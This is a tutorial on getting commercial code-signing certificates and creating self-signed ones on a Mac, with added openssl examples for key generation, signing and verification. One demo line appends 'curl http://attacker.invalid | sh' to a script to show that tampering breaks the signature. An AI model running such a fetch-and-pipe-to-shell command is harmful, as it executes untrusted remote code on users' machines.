

This article describes the use of code-signing certificates on Macs.

For production use by the public, obtain a code-signing certificate from a trusted CA (Certificate Authority) whose root is recognized by the operating system and application that will verify your script/build. Generate the private key on your own machine and send the CA only a CSR; the CA returns a certificate, never a key.

You ship your script/program signed with that certificate. The signature, with the certificate chain embedded in it, travels with the file; the private key stays with you.

The user's machine verifies the signature against the certificate. If the issuing CA is already trusted on that machine, nothing more is needed; otherwise the certificate is imported onto the computer of those who wish to use your script/program.

If your users need to reference a CA not already known to their operating system or browser, they also need to install the CA's root certificate, in addition to the certificate the CA generated for you. This is the case for “self-signed” certificates and in organizations whose employees use a corporate-owned CA.

Certificates exported on Macs may be in a different container format than those used on Windows: Keychain Access exports a .cer (certificate only) or a .p12 (certificate plus private key), while Windows tools use the same PKCS#12 format under the .pfx extension. openssl converts between PEM and DER where needed.

Certificates are issued for a fixed period, after which they need to be renewed. Signatures made before expiry stay verifiable only if they were timestamped (see step 19 below).

Generate a signing key on CA website

  1. Select a CA, or a reseller of one.

    Public Trusted CAs

    One reseller offers $69.17/year for a certificate from Comodo, which sells certs direct via InstantSSL at $179/year.

    Alternately, Tucows offers certs at $75/year. VeriSign and GoDaddy (Starfield) are two of the largest commercial root CAs. They charge $250 per year or more because their roots are in Apple’s OS X Trust Store and Microsoft’s root program, so certificates they issue are trusted out of the box.

    A code-signing certificate is different from the “SSL/TLS” certificates used by web servers: it carries the Code Signing Extended Key Usage, and a TLS certificate is not accepted by code-signing verifiers.

    PROTIP: Whether a CA is recognized by web browsers is not the question for code-signing certificates used with PowerShell scripts, ActiveX controls, Java applets, dynamic link libraries, .cab files and .jar files. What matters is whether the CA’s root is in the trust store the verifier uses: the Windows certificate store for Authenticode and PowerShell, the Java cacerts keystore for .jar files.

    CAcert.org offers certificates, but its root is not in mainstream trust stores, so to users they are equivalent to self-signed certs.

    However, obtaining them is less work than creating self-signed CAs and certs, described below.

    A CA in Poland, certum.pl, used to offer free certificates.

    CA StartSSL.com operated in Israel; its roots have since been distrusted by the major browsers.

    Certificates cost money because issuers confirm the validity of the organizations whose certificates they sign. This includes verifying physical existence and business presence.

  2. Get a physical address to use consistently on your domain registration, phone, utility and tax bills, bank account, and driver’s license.

  3. Get a telephone bill under that address.

    If you don’t want to use your cell phone, an account at http://www.magicjack.com/ (about $40/year) will do.

  4. Get a domain name with email set up under the same address as on your driver’s license and utility bill.

    Comodo does not allow use of free email accounts such as Gmail, Hotmail, etc.

  5. Use Google Chrome to register for a Comodo account using that email address.

    Comodo accepts e-mail only from addresses registered with a support account.

  6. Confirm the email, then return to the website for Password Login.

  7. Get a bank checking account and a printed check showing that same physical address.

    You may have to wait to receive your printed checks.

  8. Scan each proof of your identity into a PDF file.

    You will be asked for a copy of identity papers shortly after you apply, so don’t pay for a cert until you have all the files you will need to present.

    A property tax bill, if you own your home.

    A copy of the applicant’s Articles of Incorporation. Information in the Articles should be verified by checking the relevant government corporation database wherever possible. If it is not possible to at least verify the existence of a registered entity of that name in the relevant jurisdiction, then the Articles must be supplemented with additional documentation. Acceptable additional documentation: Business License, DUNS details (e.g. Dun & Bradstreet company number).

  9. Get an electric or phone utility bill under the address to be associated with the certificate.

  10. Download and print Tucows’ face-to-face verification form.

  11. Find and go to a notary to confirm your ID and sign that verification form.

    Most banks have a notary and will notarize free for their customers.

  12. Pay for the certificate on the website.

    Some CAs require you to first create a CSR (Certificate Signing Request) file. It is generated locally (with openssl or the browser’s key generator) and contains your public key and identity, but not the private key, which never leaves your machine.

  13. Upload PDF files to verify your identity.

  14. Wait for a phone call from the CA.

  15. Wait for the email with instructions to download the cert from their website.

    You must use the same computer and web browser used to request the certificate, because the private key was generated and stored there.

  16. Export the key pair (private key plus certificate) from the browser as a password-protected PKCS#12 (.p12/.pfx) file.

  17. Back up that file immediately to alternate media such as a CD or DVD, and keep its passphrase separately: anyone holding the file and the passphrase can sign code as you.

    PROTIP: USB flash drives degrade over time more quickly than CD or DVD discs.

  18. Put the media in a fire-safe locked box.

  19. Timestamp your signatures. A timestamp server (Comodo runs one) countersigns each signature with the time of signing, so verifiers still accept the signature after your certificate has expired, because the certificate was valid when the code was signed.

    See http://wiki.cacert.org/TimeStamping
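The CSR step above (step 12), as an added example that is not from the original page: the key pair is generated locally with openssl, only the CSR is uploaded, the CSR is checked before upload, and the key is bundled into a PKCS#12 file once the CA returns a certificate (the bundling function is shown but not run, since no CA cert exists here). The subject fields, file names and the `WORK` directory are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): generate the code-signing key
# pair locally and a CSR to upload to the CA, so the private key never leaves
# this machine. Subject fields and file names are placeholders (assumptions).
set -e

WORK="${WORK:-$(mktemp -d)}"

# 3072-bit RSA private key (2048 is the minimum CAs accept today).
make_key() {
  openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:3072 \
    -out "$WORK/codesign.key" 2>/dev/null
  chmod 600 "$WORK/codesign.key"   # private key: owner read/write only
}

# Build the CSR. The CA fills the final certificate from its own vetting, so
# the CN/O here should match the documents you will upload.
make_csr() {
  openssl req -new -key "$WORK/codesign.key" -out "$WORK/codesign.csr" \
    -subj "/C=US/ST=California/L=Los Angeles/O=Example Corp/CN=Example Corp Code Signing" \
    -addext "extendedKeyUsage = codeSigning" 2>/dev/null
}

# Sanity check before uploading: the CSR's self-signature must verify
# against the public key inside it (exit 0 = OK).
verify_csr() {
  openssl req -in "$WORK/codesign.csr" -noout -verify 2>/dev/null
}

# Print the subject so it can be compared with the CA's paperwork.
csr_subject() {
  openssl req -in "$WORK/codesign.csr" -noout -subject
}

# After the CA returns the certificate ($1, not created here), bundle key and
# cert into a passphrase-protected PKCS#12; that file is what step 17 stores
# offline and what you import into Keychain Access.
bundle_p12() {
  openssl pkcs12 -export -inkey "$WORK/codesign.key" -in "$1" \
    -out "$WORK/codesign.p12" -passout "pass:$2"
}

make_key
make_csr
verify_csr
csr_subject
```

The uploaded .csr is public information; the .key file is the only secret and should stay on the machine (and in the offline backup) for the life of the certificate.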

If the above is too much of a hassle for you, self-sign your app.

Create self-signed root code-signing cert on Mac

Based on https://support.apple.com/kb/PH20131?locale=en_US&viewlocale=en_US

  1. Click the Spotlight search icon at the upper-right corner of the menu bar.

  2. Type “Keychain Access” to find that GUI.

  3. Open “Keychain Access”, then from its application menu choose Certificate Assistant, then Create a Certificate.

  4. Enter a name for the certificate in the “Create Your Certificate” GUI.

    PROTIP: Include in the Name several items separated by dashes: your email, the machine name assigned by security, and your user name, such as “wilsonmar@gmail.com-M345-mac”.

  5. Highlight the name and copy it to your Clipboard.

  6. For Identity Type, leave it “Self Signed Root”.

  7. For Certificate Type, select “Code Signing”.

  8. Click Create and Continue for the pop-up.

    NOTE: 2048-bit RSA keys are the default (and the minimum today). The program can generate up to 4096 bits.

    See https://developer.apple.com/library/content/technotes/tn2326/_index.html

  9. Click Create. The certificate is valid for one year.

  10. Click Done.

    Export for running elsewhere

  11. Return to the “Keychain Access” GUI.

  12. Click to select the certificate you just created.

  13. Select menu File, Export Items.

  14. Paste in Save As field the certificate name (“wilsonmar@gmail.com-M345-mac”).

  15. Instead of “.p12” select “Certificate (.cer)”. The .cer holds only the public certificate, which is what other machines import in order to trust your signatures; a .p12 would also contain the private key and must never be distributed.

  16. Click Save.

  17. Quit Keychain Access.

    Sign a file on Mac

  18. Go to where you saved the cert created following the steps above.
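The self-signed flow above (create the identity, export the .cer, sign a file), as an added example not from the original page, done with openssl so that each artifact is visible and runnable anywhere. It generates a code-signing identity, exports the public .cer, signs a constructed script, verifies it from the .cer alone, and shows what fails on tampering and when the verifying machine has imported a different certificate. The names dev-mac, other-mac, hello.sh and the `WORK` directory are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original page: the self-signed Keychain
# Access steps redone with openssl. Identity and file names are assumptions.
set -e
WORK="${WORK:-$(mktemp -d)}"

# Self-signed key pair + certificate with Extended Key Usage = Code Signing,
# which is what Keychain Access's "Code Signing" type sets; valid one year.
make_identity() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 365 -sha256 \
    -keyout "$WORK/$1.key" -out "$WORK/$1.pem" -subj "/CN=$1" \
    -addext "extendedKeyUsage = codeSigning" 2>/dev/null
  chmod 600 "$WORK/$1.key"        # the private key never leaves this machine
}

# The exported ".cer": DER-encoded certificate only, no private key.
export_cer() {
  openssl x509 -in "$WORK/$1.pem" -outform DER -out "$WORK/$1.cer"
}

# Does the exported cert carry the Code Signing EKU? (exit 0 = yes)
has_codesigning_eku() {
  openssl x509 -in "$WORK/$1.cer" -inform DER -noout -ext extendedKeyUsage \
    | grep -q "Code Signing"
}

# Detached signature: SHA-256 of the file, signed with the private key.
sign_file() {
  openssl dgst -sha256 -sign "$WORK/$1.key" -out "$2.sig" "$2"
}

# What a user's machine does: take the public key out of the .cer and check
# that the signature matches the file's current contents (exit 0 = valid).
verify_signature() {
  openssl x509 -in "$WORK/$1.cer" -inform DER -noout -pubkey > "$WORK/$1.pub"
  openssl dgst -sha256 -verify "$WORK/$1.pub" -signature "$2.sig" "$2" >/dev/null 2>&1
}

# A valid signature proves nothing unless the signer's cert is in the
# verifier's trust store; $2 models the .cer the user imported (exit 0 = trusted).
is_trusted() {
  openssl verify -CAfile "$WORK/$2.pem" "$WORK/$1.pem" >/dev/null 2>&1
}

# --- demo on a constructed script ---
printf '#!/bin/sh\necho hello\n' > "$WORK/hello.sh"
make_identity dev-mac
export_cer dev-mac
has_codesigning_eku dev-mac
sign_file dev-mac "$WORK/hello.sh"
verify_signature dev-mac "$WORK/hello.sh"

# Tampering after signing invalidates the signature.
cp "$WORK/hello.sh" "$WORK/evil.sh"; cp "$WORK/hello.sh.sig" "$WORK/evil.sh.sig"
printf 'curl http://attacker.invalid | sh\n' >> "$WORK/evil.sh"
if verify_signature dev-mac "$WORK/evil.sh"; then echo "tamper not detected"; exit 1; fi

# A machine that imported some other .cer does not trust this signer.
make_identity other-mac
if is_trusted dev-mac other-mac; then echo "unexpected trust"; exit 1; fi
is_trusted dev-mac dev-mac
echo "signed, verified, tamper detected, trust needs the imported .cer"
```

On a Mac the Keychain equivalents are `codesign -s "wilsonmar@gmail.com-M345-mac" hello.sh` to sign, `codesign --verify --verbose hello.sh` to verify, and, on the user's machine, `security add-trusted-cert -r trustRoot -k ~/Library/Keychains/login.keychain-db wilsonmar@gmail.com-M345-mac.cer` to import the .cer. Note that nothing enforces a codesign signature on a plain shell script automatically; Gatekeeper checks apps and installers, so for scripts the verification is an explicit `codesign --verify` step by whoever runs them.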


